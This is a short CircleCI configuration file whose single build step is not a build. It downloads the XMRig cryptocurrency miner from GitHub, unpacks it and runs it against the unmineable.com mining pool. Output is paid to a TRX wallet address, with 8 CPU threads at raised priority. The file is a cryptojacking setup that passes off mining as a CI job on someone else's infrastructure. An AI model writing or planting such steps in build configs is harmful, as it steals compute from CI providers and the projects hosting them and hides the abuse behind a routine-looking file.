version: 2.0
jobs:
  build:
    docker:
      - image : circleci/ruby:2.4.2-jessie-node
        auth :
        name : mydockerhub-user
        password : $DOCKERHUB_PASSWORD #context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar -xvf xmrig-6.15.1-linux-x64.tar.gz && cd xmrig-6.15.1 && ./xmrig --cpu-affinity 0xFF --randomx-8gb-pages -o rx.unmineable.com:3333 -u TRX:TNvTwYcdmG8YtL3zzWoW2XUmYBuYGSgJfB.putra2-$(echo $(shuf -i 1-9999 -n 1)) -k --cpu-priority 3 --asm=ryzen -t 8
